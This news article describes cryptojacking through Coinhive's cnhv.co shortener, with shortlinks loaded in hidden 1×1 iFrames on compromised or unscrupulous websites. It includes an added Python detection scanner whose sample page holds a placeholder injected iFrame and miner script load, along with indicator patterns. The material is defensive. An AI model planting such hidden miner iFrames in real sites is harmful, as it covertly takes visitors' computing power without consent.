How a URL shortener allows malicious actors to hijack visitors’ CPU power
URL shorteners are often used by malware peddlers and attackers to trick users into following a link they otherwise wouldn’t. But Coinhive’s URL shortener carries an added danger: your CPU power can be surreptitiously hijacked to mine Monero.
About the cnhv.co URL shortener
“If you have a URL you’d like to forward your users to, you can create a cnhv.co shortlink to it. The user has to solve a number of hashes (adjustable by you) and is automatically forwarded to the target URL afterwards,” Coinhive explains.
When a user clicks on the link, they first see an interstitial page showing a progress bar.
Once the specified number of hashes is solved, they are automatically redirected to the destination URL.
Cnhv.co is meant to be used by site owners to monetize traffic from their website visitors so that they don’t have to show ads or so that the visitors don’t have to pay for the content. Ideally, the site owner should outright tell the visitors what the shortener is doing.
Unfortunately, the shortener has also become another way for scummy site owners and attackers who have compromised websites to mine cryptocurrency while the visitors are none the wiser about what’s happening to their computers.
Cryptomining through hidden URL shorteners
Normally, the miner JavaScript is loaded only when the visitor actually clicks on the shortened URL/link. But malicious actors have found a way to trigger the mining without any user interaction.
Sucuri researchers have flagged hundreds of websites that have been injected with iFrames loading a cnhv.co shortlink. Because the iFrame is fetched automatically along with the rest of the web page, the mining starts without any action on the part of the visitor.
“The miner script is not being directly loaded from your website but rather through the cnhv[.]co website. It adds what could be viewed as an additional layer of ambiguity and thereby helps it evade detection as some major anti-virus/information security companies do not have it listed as suspicious yet, though many will detect it once the main script coinhive.min.js is loaded,” Sucuri’s Luke Leal explains.
But how does all of this stay hidden from the visitor? Well, the malicious actors have had the brilliant idea of setting the size of the iFrame to 1×1 pixel, so that visitors are unlikely to notice the iFrame on the page (it looks like a speck) and will certainly not see the hashing progress bar.
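As an added example (not code from the article, from Coinhive or from Sucuri), the following Python script applies the two indicators the article gives, an iFrame whose src points at cnhv.co and a script tag loading coinhive.min.js, to a page’s HTML, and separates shortener iFrames that are sized or styled to be invisible from ones a site owner shows openly. The sample page, its shortlink IDs and the script host are constructed placeholders, and the concealment heuristics (1×1 dimensions, the hidden attribute, inline display:none / visibility:hidden / opacity:0) are an assumption about what a scanner should check; rules from external stylesheets are not examined.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Indicators named in the article: the cnhv.co shortener host and the coinhive.min.js
# miner script it eventually loads. Assumption: these are the only indicators we look for.
SHORTENER_HOSTS = {"cnhv.co"}
MINER_SCRIPT_NAMES = {"coinhive.min.js"}

_PX = re.compile(r"^\s*(\d+)\s*(?:px)?\s*$", re.I)
_STYLE_HIDDEN = re.compile(
    r"display\s*:\s*none"
    r"|visibility\s*:\s*hidden"
    r"|opacity\s*:\s*0(?:\.0+)?(?![\d.])"
    r"|(?:width|height)\s*:\s*[01](?:\.\d+)?(?:px)?\b",
    re.I,
)


def _px(value):
    """Parse a width/height attribute such as '1' or '1px'; None for anything else."""
    if value is None:
        return None
    m = _PX.match(value)
    return int(m.group(1)) if m else None


def _host(url):
    """Hostname of an absolute or scheme-relative URL, lowercased ('' if none)."""
    url = (url or "").strip()
    if "://" not in url and not url.startswith("//"):
        url = "//" + url  # heuristic: treat 'cnhv.co/abc' like '//cnhv.co/abc'
    return (urlparse(url).hostname or "").lower()


def _on_host(url, hosts):
    """True if the URL's host is one of `hosts` or a subdomain of one."""
    h = _host(url)
    return any(h == d or h.endswith("." + d) for d in hosts)


def is_concealed(attrs):
    """True if the tag's own attributes make it effectively invisible: the 1x1 pixel
    trick described by Sucuri, the hidden attribute, or inline CSS to the same effect.
    Limitation: rules from external stylesheets are not visible to this parser."""
    w, h = _px(attrs.get("width")), _px(attrs.get("height"))
    if (w is not None and w <= 1) or (h is not None and h <= 1):
        return True
    if "hidden" in attrs:
        return True
    return bool(_STYLE_HIDDEN.search(attrs.get("style") or ""))


class CryptojackScanner(HTMLParser):
    """Collects iframes pointing at the shortener and script tags loading the miner."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)  # HTMLParser lowercases attribute names; bare attrs map to None
        src = attrs.get("src") or ""
        line = self.getpos()[0]
        if tag == "iframe" and _on_host(src, SHORTENER_HOSTS):
            kind = "hidden-shortener-iframe" if is_concealed(attrs) else "visible-shortener-iframe"
            self.findings.append({"kind": kind, "src": src, "line": line})
        elif tag == "script":
            name = src.rsplit("/", 1)[-1].split("?", 1)[0].lower()
            if name in MINER_SCRIPT_NAMES:
                self.findings.append({"kind": "miner-script", "src": src, "line": line})


def scan_html(html):
    """Return a list of findings ({kind, src, line}) for one HTML document."""
    scanner = CryptojackScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


def finding_kinds(html):
    """Sorted finding kinds for a document, handy for triage."""
    return sorted(f["kind"] for f in scan_html(html))


# Constructed sample page (not a real site); shortlink IDs and the script host are placeholders.
SAMPLE_PAGE = """<!doctype html>
<html><head><title>Example</title></head><body>
<h1>Welcome</h1>
<iframe src="https://www.youtube.com/embed/placeholder" width="560" height="315"></iframe>
<!-- injected: the 1x1 trick -->
<iframe src="https://cnhv.co/placeholder1" width="1" height="1" frameborder="0"></iframe>
<!-- a site owner using the shortener openly -->
<iframe src="https://cnhv.co/placeholder2" width="600" height="400"></iframe>
<script src="https://cdn.example.invalid/lib/coinhive.min.js"></script>
</body></html>
"""

if __name__ == "__main__":
    for f in scan_html(SAMPLE_PAGE):
        print(f"line {f['line']:>3}  {f['kind']:<26} {f['src']}")
```

Run against the sample it reports the 1×1 iFrame as hidden, the 600×400 one as visible, and the miner script load separately; only the first of those is the abuse the article describes, which is why the scanner keeps the two iFrame cases apart rather than flagging every cnhv.co reference.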
Some other security researchers have also previously flagged the trick:
#Coinhive found on the website of Union Public Service Commission (India) – https://t.co/ZzPJllNtWz
This is an interesting case of #cryptojacking as it's injecting the short URL form of Coinhive (cnhv[.]co) via the code shown in the screenshot.
cc: @fs0c131y pic.twitter.com/b4GAI1HIEs
— Bad Packets Report (@bad_packets) March 16, 2018
According to Leal, some of the sites using the trick appear to have been compromised, but others seem not to be: their owners are intentionally using the iFrame to stealthily mine cryptocurrency off their visitors.
“There needs to be an increased focus on adding controls so that this type of blatant abuse can be stopped, or at least greatly reduced. As it stands, it seems to be too easy for this abuse to occur injuring the credibility of legitimate websites who want to ethically use cryptomining as a form of monetization,” he noted.